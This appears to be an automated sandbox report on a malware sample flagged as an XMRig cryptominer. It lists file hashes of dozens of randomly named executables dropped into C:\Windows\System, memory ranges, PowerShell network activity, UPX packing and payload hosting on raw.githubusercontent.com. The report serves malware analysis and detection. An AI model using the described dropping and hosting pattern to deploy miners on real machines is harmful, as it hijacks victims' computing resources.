SHA512 e8faef7804ea3f9c88dc901e1c61ae7e34dcb112fa4d98355e24d1ee91014a068b8dc6c493fe55163d8a9b7a0ea7ca49a18a3ba633716cc09db78d4aa400f0c9

C:\Windows\system\bZpjHie.exe

MD5 da5b26375a98a8be2dc8eed97700ec98
SHA1 24871bd54282a547a55b7404aa969e23c3f5e3d2
SHA256 a2447269a3bb0307ca9ab1114d5ea5ab7dfe90b15c634810683ce948c0336992
SHA512 da33bfd6529b9f05e221a6256bffcb018e2a6ec59573f274f8e30324fad18aeea92615b0910dad14b024088416cca2a7912bae99f70c53141ef669150ca02242

\Windows\system\ERkbqPk.exe

MD5 a32e8e656f22e56559716a1c69e2a655
SHA1 2257a5bb173d733b0899c9b7d31cc04d5eb26340
SHA256 9e3498a44130bf55c6698ce096ba99a747fc213b1182446edcbcfa4a34c93b4a
SHA512 832a8d063e5d2286460958fafa4779bfc22705a642bb097a0301cd8126799a1818a2a6a986c35434ea94b69f860305929232efd262ab02fe87239346ec942ee6

\Windows\system\usOrQbM.exe

MD5 58ddea13f26ec309dd98f0963d403c1a
SHA1 bddbdac9f11db7016748851dadd2fe36dd471258
SHA256 96a3460755d9093a7e10768a9c96464066ad4cdd32380270aca0dfdd8d4c499f
SHA512 837898e2d112d3ab847bbd9659afa27a33d672e88a89dc40740a9c755f15ff31b0c6ee2996a9cb845c1e97c32d39b03f4e4f5651eefe28482850ee3d58587cbc

memory/2808-31-0x000000013F540000-0x000000013F932000-memory.dmp

C:\Windows\system\XBAFwez.exe

MD5 2fda4351f0891e2a1bf993708405353b
SHA1 bd62610ee58df46a5677df3db826483ea4b899d7
SHA256 96e9de6dd60ceea6ee9ee350167236f1f1b1c06bcc80dda014fc4192af12d511
SHA512 4d22ae729951425fc6fbc67ad5dd9d469dbe34f837b8dbecfeb2c07b3c74a219f216da7436828b34ab80ced3ad4bd1d1364bd30920359657a1684736ef7f7fa7

\Windows\system\zFDbmiX.exe

MD5 a75478ce40a880c1f27dd33f59eb0770
SHA1 e1d9e87f1bb80950eff112f99e4012592c2cd12d
SHA256 d12924d00603f1f55d682a55bb7862f79874b119bce40941837abe57525387e7
SHA512 e6b75abdd683694f85f1aa3f795f85b1684eb98382ffed499047d1ed1950e6216d1f6f8db60b5cdb4810ce38c669186caa94f8347dd73f45ecc2b86ef4bde455

\Windows\system\ztSrceU.exe

MD5 b06a555019e5e5ff0ed4f83109058cad
SHA1 6e1ef89e899cc91c3a7ad6fc5aace8c546d22995
SHA256 cfab3924a87aa68c4e49cf4e21aa76b1b1228a6194220e9bda8525ee101118bb
SHA512 d740bd4f9593da7467e31c97b2bff6aa3585f0453958ab29f75bdf2632d6012148e50d806765cececd10aa6b52cb0ae7bac490cdb7047750e7415dc9afb3f21e

C:\Windows\system\kWUNrbH.exe

MD5 b6a8fb2a96d79d54095f9efdb0fd4d55
SHA1 64663c95eef5e2718820f4a6a9b4f5b6a08e8569
SHA256 41db056c9b8a9c5d2e942e5c8da9b0f56adbd37f94c5d477ace77600a0711237
SHA512 19e134cdf27233e7df8bf6bfb4cd56710f3c5f0b1cf4391d044268e6e36e61a1cece299796cd70e442f8762817154d5ba012bc79a152750a64d4193e8c75de46

memory/2444-117-0x0000000003350000-0x0000000003742000-memory.dmp

C:\Windows\system\bUThkLF.exe

MD5 a6933fe99462df8337cf97e3a4da0aaf
SHA1 e519766d53a8f2ec1a147d6990cc9f60ea8ddb4a
SHA256 f5fbeb14a05eaabcb9a0670750e1543eb6bcbe887ec7e936f1285714fac3ca64
SHA512 5610e4b661346876fca3bd55b08c488e2f51bd1648d90dcf4a11f809c8a01ffd2f031a706662f988839df8f66ced54e27a7e8eadff2a9a5de6ede2400b31bb6e

C:\Windows\system\lDcyDzt.exe

MD5 744979617feae8372c349e4a2299857c
SHA1 8b6cd7561c375ccaa22a046611d92d672b0164c0
SHA256 c6e34d7211f4e8e8184f596b34a0fa897a971fe8d2cab9d99c64b73ce3984339
SHA512 52093a5c933d71587e7e6eb1c9b4fe2fe4e46bbc6ca20c15bd2a0da81d8aaaf30ea7d7c14e9cb64606ebf72eb08fc380a5fe8cf0a42fcef2d51d1a9c84700c5b

memory/2348-103-0x000000013FB70000-0x000000013FF62000-memory.dmp

\Windows\system\cHOAffe.exe

MD5 edeb782026bee42144918a1a68181a40
SHA1 707b669e578ec9e43745fd86c2ba601bc83b2cdc
SHA256 5bc37b6200eaad97df4dcbf3b4b13f4792294d51813a7e0f97fe1b6a3650506e
SHA512 259062c73119b86d304f18b473a4d97c51b578197cc6d567b6d3f031db79e95f9198e98b7762bdf834f9611c2f7a04d014efde322b20e3ebd8c7790d39898fda

\Windows\system\JFJThNT.exe

MD5 8776b0a90058647b81093c5b52f831aa
SHA1 4aa4b91ad11e0f6a36e2d845d2da0fd2361a8ebf
SHA256 06492effcd9238b9cebb87baaf1536c107a16ca880103fb8e083a6105c9d91ed
SHA512 f21f81151e625a5e672e9ff254b6450580d1bbc82713ff2d6607ade98f845d1481f82d055f2494806f9f252261543781cb3432d76339d5e806026e1e5b792f6a

\Windows\system\TMquOAO.exe

MD5 8c962b1eb95075ae6cf29c50cb49cab3
SHA1 4b10fdb22516198494431805a4f7f267a8cb78be
SHA256 249db17a26da9d79547406584200864534bf7ce4069104ecb4e4d4832e95c492
SHA512 2225fb3bbda66cd8062705945ef08b73cefc78b311bbebe487a4ed6559a08b312335be10c9f842d2a71167b3d8eecf029d325dc75f5c03092ee9e3809035d5d3

C:\Windows\system\uNExlBv.exe

MD5 f0eb43b4afe34c37c3ba001ca63a8393
SHA1 d5f563a3d9a60bbcefaa25332f5d4067633e880f
SHA256 36103c5d9fa5618fb1cce935cba8fb262d3c7e488e4bcf4e4e563af2a51f3098
SHA512 0cd89c811b93c3a6738e797ef028e75af5ecff8c2b5f79c4ef5e9135fe400e58be77cf0de917f912fb7aadcb760dd97e3447fd761b5e5d1eb000a49842c266f8

\Windows\system\vkbDuwW.exe

MD5 f7bdbe73a286cbd2dd8eb1f0edaaf2fa
SHA1 1a06cf4bec851058ae5bfe646a56f74b957e5795
SHA256 3402c3340b3546154e3871177cb41fcf44bddfda00131e113095c1a7497aeffa
SHA512 68c85801a9dddc4e1e8f9bb44140d4459fba0bc9bb1dd16618b743277b31cfceeb58d248f210b16624aac6eed9551487fb4e8f8bce865bb8650d101cb7aaecbd

\Windows\system\jiBmTTt.exe

MD5 e7676fd05797052ea4f5f87cdeb18b47
SHA1 66442488ae10b6b181366fe9696ef53be31a51da
SHA256 951454f32e17df2fa05f8343acb0373790e71569b73307d8ddb08c7bc870fd08
SHA512 3879e8929b8853aa7b8f6136e23cdd7ac02e4845b0f4382565cd92154d9b658354555c348d2b2b580a8731db1e1a89948f2aa8074d33f7206c7365f63f7a6c16

C:\Windows\system\UQqdLaw.exe

MD5 c3c025ab6c4ba785d52698964e117509
SHA1 de192708c24711054d6b4f59f88c2fda0e3ab3c7
SHA256 5f7ea10becfc51124d167ff99f1625a56fd4e40b1258875cba376af99f4db8f9
SHA512 180ba87b39f790d1a7a5bd9aaf68205382aec164b10a2d77d909c57f32fd3eb5469146a0a5e33512f4afb2de0694e3bce70e83477d331ee191979650ddc7619e

C:\Windows\system\TPIVpik.exe

MD5 89cc8abd3606584f1096fed0ec07dfbc
SHA1 c417ae2da4ef0036c1b6c5f6cdb11c3e3af9ee83
SHA256 5763fb0470f9c61292e035d7db71e59685f89811bfaf9fdbe7fff3268cfcc346
SHA512 f53508be0ba10704905f8039133b1a1223115259fdad9b0fa67c53b2932d363f1e2a1a0a7b3fba2f511a82aa41edd935ca6020d8050ee60fbc16eb310f94153e

C:\Windows\system\glHHCvA.exe

MD5 92496eb69dfd711f5118f7f94a91f168
SHA1 4a8b2a730261c6c32844ae8a51020bb8cfbc95af
SHA256 44475dc2b9fdd6eff722b236f88c71334b76dc3317f44907cee7a975b81da559
SHA512 5e7c23c5f1c141afcb96db5d20b9993b733df5e0148f77eb66f001c297d0afa0665e9e47ecc05634939d962d2e47ab70d1c93e2e7d6a4c5908fd4e7d9d545176

C:\Windows\system\WnYTmKA.exe

MD5 f52253790a8b3736fec1bdf24c9f99c1
SHA1 546ef5eaeba963f3e20f3aa1f17edc724ee69170
SHA256 9ad42b3e942195ccc99dd782b0943cecd1a6ed104c68bea88c1adb7f2fb791ef
SHA512 c9ecef00e198f8047c62bf7b28487e61088a269fdaa858792024a7aea9378b436af26dfbab0ad86b1f9de7f7564c0ea5a0c150657927e67263e912dd49b3c414

\Windows\system\pdxFzOX.exe

MD5 1840b59431a1b8756f4428e7c7812c84
SHA1 aca7068f4cae0b00529bb4181bd7805a6196216a
SHA256 736c89390757d961442125bbca03326f5bf5d951c30f17b8e53dca85ffa02bed
SHA512 8e6823a8315160f2e26354824975b62dd17cbf6d4e1d8d9d7bf2d320ab0527b15286211fb6531ec9a52dbb0af118b81ae7c59e670e599b1a9b22deb123ceb200

C:\Windows\system\pQPuWvN.exe

MD5 1faf40f9eaa167b86269839df4f79731
SHA1 cde65d49bbb3f9baf815f68dbb56466579bf0cb5
SHA256 e96a298033e606816fa3c451a8c7eec14f206a3d47f99c5af0c2f367bcb78b6d
SHA512 f82c2c0fc2a87378910dffb7da1c7477242bb2f05feece1ba31eb7f6c1ed27124f90ebdcaca13d25f50bdff84fc32f15958fbcf6668a8ba376323d5e6ed8baee

memory/2444-125-0x0000000003350000-0x0000000003742000-memory.dmp

memory/2444-124-0x000000013F6B0000-0x000000013FAA2000-memory.dmp

memory/2260-54-0x000000013F8A0000-0x000000013FC92000-memory.dmp

memory/2812-53-0x000000013F260000-0x000000013F652000-memory.dmp

memory/1964-52-0x000000013F530000-0x000000013F922000-memory.dmp

memory/2444-51-0x000000013F540000-0x000000013F932000-memory.dmp

memory/2444-49-0x000000013F500000-0x000000013F8F2000-memory.dmp

memory/2444-48-0x000000013F9F0000-0x000000013FDE2000-memory.dmp

memory/2672-47-0x000000013F360000-0x000000013F752000-memory.dmp

memory/2780-44-0x000000013F220000-0x000000013F612000-memory.dmp

memory/2444-43-0x000000013F8A0000-0x000000013FC92000-memory.dmp

memory/2444-42-0x0000000002E80000-0x0000000003272000-memory.dmp

memory/2444-40-0x000000013F530000-0x000000013F922000-memory.dmp

memory/2444-38-0x0000000002E80000-0x0000000003272000-memory.dmp

memory/2444-123-0x000000013FEF0000-0x00000001402E2000-memory.dmp

memory/2444-122-0x0000000003350000-0x0000000003742000-memory.dmp

memory/2608-114-0x000000001B750000-0x000000001BA32000-memory.dmp

C:\Windows\system\SStcNtA.exe

MD5 8a3a0393b5006159a2c864609b458b46
SHA1 28605b01054776e6a8471c22276792ddc518b9be
SHA256 157ac524dc56f41e2fa20acc0f9fc3d988d59dd6f6c60039ff08c6ad55010350
SHA512 1da8a8d9e153f42dffba620693a750802aa7036c439770bda48ec6e470cd4d9697ce2c8424ea0fbc38fb8574f52e65aba788cbc582f4509d9467fa3a4d233b95

memory/1412-112-0x000000013FEF0000-0x00000001402E2000-memory.dmp

C:\Windows\system\yLNFPir.exe

MD5 5266eed7f489e3b0d86373b014c73269
SHA1 4535435c0d9009e64ad0ab4cd4ed5c4e1ab9bb77
SHA256 3c93ef54561d5a2acc8bd3cdf923095bd039020f582875fe7fb57cb9f12b35cc
SHA512 2eb77dd787f2143d90b89b35ffe19dc141e20442ef81268fd419ca60213b9e39aa2a090a90641952629ee1bdcf1043fd25930fd65c32c2a3cac89f110e32e1d2

C:\Windows\system\WTAAciN.exe

MD5 a82cf18d99ec2491b99f42099a37e69a
SHA1 d38971846b595738997a18040cb7da76d3177cbe
SHA256 f3ce64b089dcab633346b4158a10974db002778645f7efd8f03d751976e1c0c2
SHA512 2c78577366dd7c0669a12d9cf253f9ed7af66abf6ed43356afe905900358bcb58741aa69320e0678f0e714f0165b19f9ac9d76667c68ca694cb36f74fbc98bca

C:\Windows\system\AFzhVuR.exe

MD5 b7838195003735a332137464d5c9a80a
SHA1 1914696f80239b7d1086d4bb0f963b63ad778cda
SHA256 6a7b4a5437fdf5319d80ca67c326c40469a61c916ecba2e80a7f4f14eb40eb8c
SHA512 b38d5164b228b2e5a6a33a7b56ac9afaad100c7659270b4731e6fcdf4d3f42b2315264fa08c1321920f61656949a4c7dfce46c02f98bad7a41952178d75e0358

memory/2444-75-0x000000013FB70000-0x000000013FF62000-memory.dmp

C:\Windows\system\ObCCrpL.exe

MD5 d57ecfedf5bc0f938a9496657894e7f2
SHA1 542c3ecccd9cca20ee91184106f9f709c5d3be16
SHA256 2057dd5ab7d82c9fe5d788599f0f1fa51f3a74ae97186e306bb72d2ada98ef96
SHA512 b9884f81f58da34353b0f5a55cff67f8971b84f6e53e42e3cf8a412232240d82af98e57080b62a8ca8243a856fbab63ec9528b1efaa75cc84aa227c1520385d5

memory/2716-69-0x000000013F9F0000-0x000000013FDE2000-memory.dmp

C:\Windows\system\yGohpOV.exe

MD5 ec56ed023d6c4026280a66a3d0f00717
SHA1 2d3cc6f021f1cf75e5aade2d75af9f9c8be67d28
SHA256 d0cd9715324d98db9923838aa80be9eceb55a5671ae12c76ad1eb428bf45986a
SHA512 f56ff36c85f3087a211aaf7e366e41aee0045b7f9d45039f35c68e0326d5011003572e50a289acf5f4d9b5057b573c0c9aa01aece3df8d508f4bb66d245b1279

memory/2608-139-0x0000000002050000-0x0000000002058000-memory.dmp

\Windows\system\aHJosGY.exe

MD5 9b8fda96ae3166b9b7fad66395bb23e0
SHA1 56b3591300ad586c0c3e7da7b03eb296a2e48931
SHA256 664ca4f2735cbd10f9d121c9fa6553b6e4522b9a28a0499866798c663f6e1532
SHA512 b731c6aefd07d1858db18bcc48782c9c442e55590f2eabd7ea605662833623e2a2777245c9b7caec0476597c3e081569afde62170ee9f30e2b28f8e40257916f

\Windows\system\qnqHkCL.exe

MD5 132d0ac3e496e1b304cbfcb9e03a8ed4
SHA1 13f9d4059965a58959bcaa8f141e20aca3948374
SHA256 9ceb0352b0c50fc63ba3becd69b868fe1606b27a58f363f04e5e0e931cbe0087
SHA512 052a14c4fb9d1dcd5a1f96ff815e0611a328d69d690f621d5085556f914859499771964b770bb0b16cfadc2b60fbccff70e92d6af0a2f105b3bde84b3bd0f9e3

\Windows\system\rXzBUty.exe

MD5 652f1b6b2220389a75d0430930ff3454
SHA1 1c4787651d11c87f86ba6a908e5b7e15f75fb5f2
SHA256 9b73b1ba27954d86aa13a3ae490efe2c76454ff3796653349d6ca9e44f262afd
SHA512 17d46db0edde5dab658c14ad120b3ef287ab0b52d49a6b92f899e73899bd94b01632b5e1191fdb5a89a3e077a2c49c831e36b91f5ae86cd937029d7c7c208bbb

\Windows\system\nBQGgsX.exe

MD5 32b9116ac1614cf15cd8aa55c57069b9
SHA1 9bc653fd45e94bac998f9b5c04ea1b0196dee19d
SHA256 717163e2485b0a18fc5e4775b76116492412d348989489994ec2dc002103d6e1
SHA512 65260fef381e073c0bc842472cac6edcf78cbbea8c5b6be1d2152d6fdc99ec71850897961cd3de6be788043546d14774ffdee0c386bb5914f0d4cd7a31e98c41

\Windows\system\PoWeeZD.exe

MD5 0e67f4b9af726761d0597703ca3995d5
SHA1 6290d9f12ebb57557d965098fa948272725c2a0b
SHA256 a9aea00f4fd3c8b2dca98fa9d5c7096e7fde3a30bc43215f27e1a2c558e5b19a
SHA512 13e73c1b80fb6a944587cc4249dca28b15d31bc9d5c0ce88b8df6349a6136a1b3e046286fa9cd1c1c22696e151d879f1cf3749e10523b0fc42c8777c66aac991

C:\Windows\system\onWTCHy.exe

MD5 069edaad56af0d3fc225b92fc7d2d3e1
SHA1 57cc6e53133a1e0e0e0510b36683f8509ae54dfa
SHA256 d6e1fcc810f428c8cca722bcb8ccb58b597532e2aa91dd86abcd1d4ff30a583e
SHA512 634dfcd6ba4cea27acfffcbf1805c4b30d461bd66be8b63c86c5171c4c9008a6dbe6627f0131c2aba195be892ac64deb313e10dafd59247da8bea2443139bf40

C:\Windows\system\LnfFjfA.exe

MD5 8312e9b992fd28f220ac56ee6d6250ea
SHA1 79aa167b0952ecf3f80384ff271df59c270449ce
SHA256 3ea96dd1b59589658733eac52bd81568f0e2013a458991a09c6f424d4d9e0709
SHA512 e871c3b90ce96db8d40da1959866db3765127b0bd7afcc0992db3f26880dd242805ac79b462c4134b65cf54f84460e5b4a11b1f64750c791014397ff41254095

memory/2872-21-0x000000013F500000-0x000000013F8F2000-memory.dmp

memory/2444-7-0x000000013F0F0000-0x000000013F4E2000-memory.dmp

C:\Windows\system\xwDFUCm.exe

MD5 d6349613f683bded6d69a7d02ace4275
SHA1 1627fabfdfae3cac338500241f4e9e969ee50ac5
SHA256 4a54b14258d08729a6205b09d8643680d1fcbeb6eaed5e636cae813e537ac662
SHA512 d83aa606a1ca4c9ad32d8a91f5b2cf833fc395e62b938477a618ca3509fa52443c5e33121c0988fd90e65d2855a59276136a584d3f8258054273372e5fbf3292

C:\Windows\system\HBPPEfh.exe

MD5 9fa2f2bc2c83847fc483e3e7b126834c
SHA1 8b6462d325e2f1ce3be472e3b52dd110ec77edc6
SHA256 2cfeba3b82f25cdebb02f8d4e5a1f9c8b06dd44b398a3a1e6c4b2e3889cd64d2
SHA512 cdf8d08cfa397a3c63f4ef05a58f2b05a8fdc5e71478c30ce0b29540695413920edc291f08e9c0e713496591adc5707c1c01f6e7f0baaad502181c860050f52f

memory/2348-6311-0x000000013FB70000-0x000000013FF62000-memory.dmp

memory/2812-6312-0x000000013F260000-0x000000013F652000-memory.dmp

memory/2672-6310-0x000000013F360000-0x000000013F752000-memory.dmp

memory/1412-6331-0x000000013FEF0000-0x00000001402E2000-memory.dmp

memory/2780-6334-0x000000013F220000-0x000000013F612000-memory.dmp

memory/2872-6348-0x000000013F500000-0x000000013F8F2000-memory.dmp

memory/2716-6813-0x000000013F9F0000-0x000000013FDE2000-memory.dmp

memory/2260-6868-0x000000013F8A0000-0x000000013FC92000-memory.dmp

memory/2808-6874-0x000000013F540000-0x000000013F932000-memory.dmp

memory/1964-6875-0x000000013F530000-0x000000013F922000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-27 06:34

Reported

2024-05-27 06:37

Platform

win10v2004-20240426-en

Max time kernel

93s

Max time network

95s

Command Line

"C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\nOsvlVs.exe N/A
N/A N/A C:\Windows\System\bxZMfjj.exe N/A
N/A N/A C:\Windows\System\vNBRRlO.exe N/A
N/A N/A C:\Windows\System\YCwTtxy.exe N/A
N/A N/A C:\Windows\System\Yalmwld.exe N/A
N/A N/A C:\Windows\System\zSrTtJg.exe N/A
N/A N/A C:\Windows\System\ntJieYF.exe N/A
N/A N/A C:\Windows\System\HaRQnqU.exe N/A
N/A N/A C:\Windows\System\SHVfHig.exe N/A
N/A N/A C:\Windows\System\JYLBnFO.exe N/A
N/A N/A C:\Windows\System\vqcCkIs.exe N/A
N/A N/A C:\Windows\System\kVCpWCY.exe N/A
N/A N/A C:\Windows\System\zJnHgwu.exe N/A
N/A N/A C:\Windows\System\ChkBlmA.exe N/A
N/A N/A C:\Windows\System\kMwODTH.exe N/A
N/A N/A C:\Windows\System\oAdYkgz.exe N/A
N/A N/A C:\Windows\System\mRrzciG.exe N/A
N/A N/A C:\Windows\System\CZYxexW.exe N/A
N/A N/A C:\Windows\System\mfdUQZU.exe N/A
N/A N/A C:\Windows\System\VquUxub.exe N/A
N/A N/A C:\Windows\System\NpdbiHN.exe N/A
N/A N/A C:\Windows\System\oOSYaGq.exe N/A
N/A N/A C:\Windows\System\oSkTxCx.exe N/A
N/A N/A C:\Windows\System\fXgqxZo.exe N/A
N/A N/A C:\Windows\System\YlgZnbZ.exe N/A
N/A N/A C:\Windows\System\tMNoHOf.exe N/A
N/A N/A C:\Windows\System\wlydLxw.exe N/A
N/A N/A C:\Windows\System\rygAwMO.exe N/A
N/A N/A C:\Windows\System\JJvJMQL.exe N/A
N/A N/A C:\Windows\System\hJsiyRl.exe N/A
N/A N/A C:\Windows\System\ANOQTHx.exe N/A
N/A N/A C:\Windows\System\WJBitpO.exe N/A
N/A N/A C:\Windows\System\QbbSmaB.exe N/A
N/A N/A C:\Windows\System\GInmdqu.exe N/A
N/A N/A C:\Windows\System\AkynjzP.exe N/A
N/A N/A C:\Windows\System\uHsSEOn.exe N/A
N/A N/A C:\Windows\System\VUnVHJM.exe N/A
N/A N/A C:\Windows\System\ifSeOKP.exe N/A
N/A N/A C:\Windows\System\eeyMbjT.exe N/A
N/A N/A C:\Windows\System\SgbPnqB.exe N/A
N/A N/A C:\Windows\System\xpfHLTS.exe N/A
N/A N/A C:\Windows\System\ODqyKus.exe N/A
N/A N/A C:\Windows\System\yBvhuPm.exe N/A
N/A N/A C:\Windows\System\JkTorYA.exe N/A
N/A N/A C:\Windows\System\rycBghn.exe N/A
N/A N/A C:\Windows\System\JiIkPyl.exe N/A
N/A N/A C:\Windows\System\wguwRVB.exe N/A
N/A N/A C:\Windows\System\znjoKGf.exe N/A
N/A N/A C:\Windows\System\OkHEgHv.exe N/A
N/A N/A C:\Windows\System\zseybzj.exe N/A
N/A N/A C:\Windows\System\fzElKiM.exe N/A
N/A N/A C:\Windows\System\ihkSjAG.exe N/A
N/A N/A C:\Windows\System\aSFoNtU.exe N/A
N/A N/A C:\Windows\System\GwjUewV.exe N/A
N/A N/A C:\Windows\System\QVyEfaL.exe N/A
N/A N/A C:\Windows\System\xMDPAYk.exe N/A
N/A N/A C:\Windows\System\rCBWeGI.exe N/A
N/A N/A C:\Windows\System\GRYGpwM.exe N/A
N/A N/A C:\Windows\System\buaycCV.exe N/A
N/A N/A C:\Windows\System\yQEDwsT.exe N/A
N/A N/A C:\Windows\System\XCpJzcX.exe N/A
N/A N/A C:\Windows\System\dTgcBul.exe N/A
N/A N/A C:\Windows\System\GpezMUy.exe N/A
N/A N/A C:\Windows\System\tMxAcKa.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\wJpuguC.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\ZULEyZq.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\FbgtXJq.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\CydZYdS.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\ootwFLb.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\pLdNMfo.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\IoaOtvG.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\OlifCZL.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\mfdvZsf.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\DhDMxuQ.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\vTFZxvn.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\jjjzKOQ.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\zGRwjEZ.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\PhYUDPc.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\tjGfVkt.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\vNBRRlO.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\qVQMnIc.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\CWxBTeQ.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\KlBuVaT.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\JJvJMQL.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\qnNNZdV.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\llsVlKy.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\MvSZNUV.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\rycBghn.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\imOjlPe.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\RcxPKDd.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\MuKqKGV.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
